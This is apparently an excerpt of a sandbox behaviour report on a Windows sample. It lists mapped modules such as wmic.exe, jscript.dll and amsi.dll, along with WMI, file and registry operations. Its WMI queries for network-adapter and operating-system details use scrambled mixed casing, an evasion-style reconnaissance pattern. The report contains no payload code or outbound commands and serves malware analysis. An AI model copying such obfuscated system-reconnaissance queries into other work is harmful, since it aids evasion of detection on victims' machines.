private_0x00000233e1370000 0x233e1370000 0x233e1371fff Private Memory Readable, Writable True False False -
private_0x00000233e1370000 0x233e1370000 0x233e1376fff Private Memory Readable, Writable True False False -
private_0x00000233e1380000 0x233e1380000 0x233e138ffff Private Memory Readable, Writable True False False -
c_20127.nls 0x233e1390000 0x233e13a0fff Memory Mapped File Readable False False False -
pagefile_0x00000233e13b0000 0x233e13b0000 0x233e13b0fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1440000 0x233e1440000 0x233e144ffff Private Memory Readable, Writable True False False -
private_0x00000233e14d0000 0x233e14d0000 0x233e14dffff Private Memory Readable, Writable True False False -
private_0x00000233e14f0000 0x233e14f0000 0x233e14fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x233e1500000 0x233e1836fff Memory Mapped File Readable False False False -
private_0x00000233e1840000 0x233e1840000 0x233e1a2ffff Private Memory Readable, Writable True False False -
private_0x00000233e1840000 0x233e1840000 0x233e195ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x233e1840000 0x233e191ffff Memory Mapped File Readable False False False -
private_0x00000233e1950000 0x233e1950000 0x233e195ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1960000 0x233e1960000 0x233e1a1bfff Pagefile Backed Memory Readable True False False -
private_0x00000233e1a20000 0x233e1a20000 0x233e1a2ffff Private Memory Readable, Writable True False False -
private_0x00000233e1a30000 0x233e1a30000 0x233e1e2ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1e30000 0x233e1e30000 0x233e1fb7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1fc0000 0x233e1fc0000 0x233e2140fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e2150000 0x233e2150000 0x233e354ffff Pagefile Backed Memory Readable True False False -
private_0x00000233e3550000 0x233e3550000 0x233e370ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x233e3550000 0x233e362cfff Memory Mapped File Readable False False False -
private_0x00000233e3550000 0x233e3550000 0x233e364ffff Private Memory Readable, Writable True False False -
private_0x00000233e3700000 0x233e3700000 0x233e370ffff Private Memory Readable, Writable True False False -
private_0x00000233e3710000 0x233e3710000 0x233e380ffff Private Memory Readable, Writable True False False -
private_0x00000233e3810000 0x233e3810000 0x233e390ffff Private Memory Readable, Writable True False False -
private_0x00000233e3910000 0x233e3910000 0x233e3a0ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e3a10000 0x233e3a10000 0x233e3e0afff Pagefile Backed Memory Readable True False False -
private_0x00000233e3f40000 0x233e3f40000 0x233e3f4ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ff900000 0x7df5ff900000 0x7ff5ff8fffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff66de40000 0x7ff66de40000 0x7ff66df3ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff66df40000 0x7ff66df40000 0x7ff66df62fff Pagefile Backed Memory Readable True False False -
wmic.exe 0x7ff66e670000 0x7ff66e6f1fff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffbf6140000 0x7ffbf6207fff Memory Mapped File Readable, Writable, Executable True False False -
amsi.dll 0x7ffbf68c0000 0x7ffbf68cffff Memory Mapped File Readable, Writable, Executable False False False -
wmi2xml.dll 0x7ffbf7780000 0x7ffbf779bfff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x7ffbf77c0000 0x7ffbf77d2fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ffbf8a40000 0x7ffbf8ad7fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffbf8ae0000 0x7ffbf8b47fff Memory Mapped File Readable, Writable, Executable True False False -
msxml3.dll 0x7ffbfc900000 0x7ffbfcb3efff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffbfe150000 0x7ffbfe19dfff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x7ffc03cc0000 0x7ffc03cd3fff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x7ffc03d40000 0x7ffc03d5dfff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x7ffc05ea0000 0x7ffc05eb5fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffc063e0000 0x7ffc06404fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffc06410000 0x7ffc06423fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffc06430000 0x7ffc06525fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffc06700000 0x7ffc0698dfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffc06b80000 0x7ffc06b90fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffc079e0000 0x7ffc07b97fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffc07e60000 0x7ffc07edefff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffc08000000 0x7ffc08009fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffc0ad10000 0x7ffc0ad19fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffc0b3b0000 0x7ffc0b3c4fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffc0c360000 0x7ffc0c3c6fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffc0c430000 0x7ffc0c43afff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffc0c8d0000 0x7ffc0c907fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffc0d740000 0x7ffc0dac1fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffc0f200000 0x7ffc0f2c7fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffc119f0000 0x7ffc11a11fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffc123a0000 0x7ffc12435fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffc12490000 0x7ffc12539fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ffc12bc0000 0x7ffc12cb3fff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x7ffc12f70000 0x7ffc12fe9fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffc13030000 0x7ffc13063fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x7ffc13070000 0x7ffc13079fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffc132f0000 0x7ffc1334bfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc133a0000 0x7ffc133b6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc134c0000 0x7ffc134cafff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x7ffc13550000 0x7ffc13589fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x7ffc13590000 0x7ffc135b6fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc136a0000 0x7ffc136ccfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc13950000 0x7ffc13978fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc13a20000 0x7ffc13a33fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc13a40000 0x7ffc13a8afff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffc13a90000 0x7ffc13a9ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc13aa0000 0x7ffc13aaefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffc13bf0000 0x7ffc13c44fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc13c50000 0x7ffc14293fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffc142c0000 0x7ffc14486fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffc14490000 0x7ffc144d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc144e0000 0x7ffc14549fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc14740000 0x7ffc147f4fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc14800000 0x7ffc14942fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc14950000 0x7ffc14a6bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc14a70000 0x7ffc15fcefff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc15fd0000 0x7ffc1624cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc16250000 0x7ffc162f6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffc16550000 0x7ffc165f6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc16660000 0x7ffc166bafff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc167d0000 0x7ffc1680afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffc16810000 0x7ffc16969fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffc16970000 0x7ffc169dafff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc169e0000 0x7ffc16b65fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffc16fa0000 0x7ffc16fa7fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc16fb0000 0x7ffc17070fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc171d0000 0x7ffc17325fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffc17330000 0x7ffc1739efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc173a0000 0x7ffc173f1fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 131 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
COM (22)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6 BFBF883A-CAD7-11D3-A11B-00105A1F515A cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 8
Fn
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\X2VS1CUM\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from Win32_NETwoRkADAPterConFiguRaTIon True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from WIN32_OpErAtIngSySTeM True 1
Fn
File (95)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\Wbem\WMIC.config type = file_attributes False 3
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info - type = file_type True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 6
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 972 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 4096 True 1
Fn
Data
Read - size = 4096, size_out = 978 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 214 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 14
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (316)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 2
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER - True 14
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 8
Fn
Open Key HKEY_CURRENT_USER - True 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4
Fn
Open Key HKEY_CURRENT_USER - True 18
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 3
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 11
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 11
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 11
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
